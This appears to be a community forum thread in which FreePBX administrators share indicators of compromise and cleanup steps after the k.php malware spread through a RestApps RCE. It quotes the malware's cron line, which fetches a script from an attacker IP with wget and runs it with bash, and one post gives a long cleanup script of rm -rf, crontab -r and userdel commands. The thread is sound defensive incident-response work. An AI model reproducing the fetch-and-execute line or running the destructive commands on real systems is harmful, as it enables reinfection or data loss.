K.php - a RestApps malicious script

If you were impacted by the restapps security regression a week or two ago, it is possible you were hit with a php script that is currently labeled “k.php” If you want to see if you were compromised by this script, I’ve included some content below that you can check. I do not claim to have identified everything, but I’m hoping this might help someone.

Anyways, here are the places you can look.

  • crontab -e -u root → if this line exists, you’re compromised. DO NOT run this for testing.

*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

  • crontab -e -u asterisk → if this line exists, you’re compromised.DO NOT run this for testing.

*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

  • cat /etc/shadow → if these users exist, you’re compromised.

bad users → supports, supermaint, sugarmaint

The following files will contain bad content that runs a wget to re-download k.php and re-infect your system. You have to echo the file content and pipe to base64 -d if you want to read it, but here are some of the files that you will find that contain bad content.

/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull
/var/www/html/admin/views/ajax.php
/var/www/html/digium_phones/
/var/www/html/rest_phones/
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/admin/views/footer.php
/var/www/html/admin/modules/freepbx_ha/license.php
/usr/local/asterisk/ha_trigger
/var/www/db/acl.db
/var/www/html/rest_phones/ajax.php

4 Likes

Note this is NOT a log4j thing but rather the restapps security regression a week or two ago.

See: 2021-12-21 SECURITY: Potential Rest Phone Apps RCE - FreePBX OpenSource Project - Documentation

I’ve edited the post to reflect that information - thank you for clarifying.

1 Like

I was kind of hoping an official response would come out or maybe an automation to allow folks to test but here were my notes based on early review…

The following should return nothing or error

getent passwd supports
getent passwd supermaint
ls /tmp/k
grep useradd /var/www/html/admin/modules/freepbx_ha/license.php
grep 'asterisk -rx' /var/www/html/admin/config.php
grep '37.49.230.74' /var/log/httpd/access*
4 Likes

same problem, same ip , same files + freepbx_engine.php.
Attention the script seems to steal the freepbx backups and the passwords contained.
The strange thing is that no calls have been made and the malicious code does not compromise any functionality of freepbx. It seems like some preparatory stuff.

2 Likes

Okay, so I know that I am hit. Now for the real question how can I get the system clean?

I would not trust any of your backups, as they contain a lot of content that has been compromised and you don’t know if your asterisk files have been tampered with or not. So, you will need to reinstall. I would advise completing all of your security steps upon fresh install - new creds, new certs, etc., ** Correction: You might have a good backup from early december you can load from, but you’ll want to validate **

That said, there are aspects of your system you can pull out en masse without concern. If you use bulk handler for your extensions, use new secrets.

I know it’s technically possible to clean out what has been infected, but given the scope, you will never really have that peace of mind of knowing the system is clean again. Because the hack adds linux users, they can access the system and load who knows what else and cover their tracks.

1 Like

If you have backups from before the restapps module vulnerability, there’s no reason not to use them and restore to a freshly built system.

A monthly from early December would be good.

1 Like

They will have access to the passwords / secrets, IP address and extensions.

good point

Maybe it’s time to consider installing a rootkit detector before yet another rootkit strikes.

I use

http://rkhunter.sourceforge.net/

4 Likes

be careful when restoring even password changes for external services, for example:
aws ftp backup
tts polly etc

1 Like

Hi everybody!
I was catch this shit with bonus feature - command line inaccessible after login without ability FreePBX connect to ip 37.49.230.74
After analysis I tried to clean system by following commands:

cp -rf /home/asterisk/.bashrc ~/.bashrc
cp -rf /home/asterisk/.bash_profile ~/.bash_profile
crontab -u root -l

!!! FIND and CLEAR Exploit CRON !!!

crontab -u root -r
crontab -u asterisk -l

!!! FIND and CLEAR Exploit CRON !!!

crontab -u asterisk -r
userdel -f supports
userdel -f supermaint
userdel -f sugarmaint
rm -rf /etc/subgid
rm -rf /etc/subgid.lock
rm -rf /etc/subgid-
rm -rf /etc/subgid+
rm -rf /etc/subuid
rm -rf /etc/subuid.lock
rm -rf /etc/subuid-

!!! FIND and CLEAR Exploit context !!!

nano /etc/asterisk/extensions_custom.conf
rm -rf /var/www/html/admin/views/ajax.php
rm -rf /var/www/html/digium_phones/
rm -rf /var/www/html/rest_phones/
rm -rf /var/www/html/rest_phones/ajax.php
rm -rf /var/www/html/admin/modules/core/ajax.php
rm -rf /var/www/html/digium_phones/ajax.php
rm -rf /var/www/html/admin/assets/js/config.php
rm -rf /var/www/html/admin/assets/config.php
rm -rf /var/www/html/admin/assets/ajax.php
rm -rf /var/www/html/admin/views/ajax.php
rm -rf /var/www/html/admin/views/.htaccess
rm -rf /var/lib/asterisk/bin/devnull2
rm -rf /var/www/html/admin/modules/freepbx_ha
rm -rf /usr/local/asterisk/ha_trigger
rm -rf /var/spool/asterisk/tmp/k
rm -rf /var/spool/asterisk/tmp/serv
rm -rf /tmp/test.sh
rm -rf /usr/sbin/sysadmin_ha
fwconsole ma downloadinstall framework --force
fwconsole ma downloadinstall restapps --force
fwconsole ma downloadinstall core --force
fwconsole reload

Seems like it’s ok.
If somebody find anything else let us know pls.

3 Likes

Just found a system tonight with this and spent about 2 hours tracing out the file. Was able to interrupt the program by editing the /var/www/html/admin/modules/freepbx_ha/license.php file and removing the line that re-writes root crontab.

I then discovered this was also in asterisk’s crontab and removed it from there as well.

This seems to have stopped the loop of re-intalling.

getting a lot of:

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

after this proceedure…

crap it looks like most of my systems got hit by this… I only have two weeks of backups so can’t do that. Is there any official way to clean this mess off a system?

Which passwords secrets?? just the phone system one or system
root passwords etc?

I don’t know much about iptables, but putting 37.49.230.74 in the blacklist of the firewall doesn’t seem to stop outbound connections to the hackers server.
Can anyone post the rules needed to stop the script connecting? I can see the outbound connections keep happening using Netstat.

I don’t have such problems.
Try to change repos to another mirror
fwconsole setting MODULE_REPO https://{mirror or mirror1}.freepbx.org
yum update and reboot.
After logon you need block access to ip 37.49.230.74 and try to clean

You need block 37.49.230.74 by your network hw\sw. Freepbx blacklist is useless

1 Like

if you edit /var/www/html/admin/modules/freepbx_ha/licence.php and remove all the commands except the delete users command. then save it an delete the line from the root crontab and asterisk crontab and it should stop the cycle…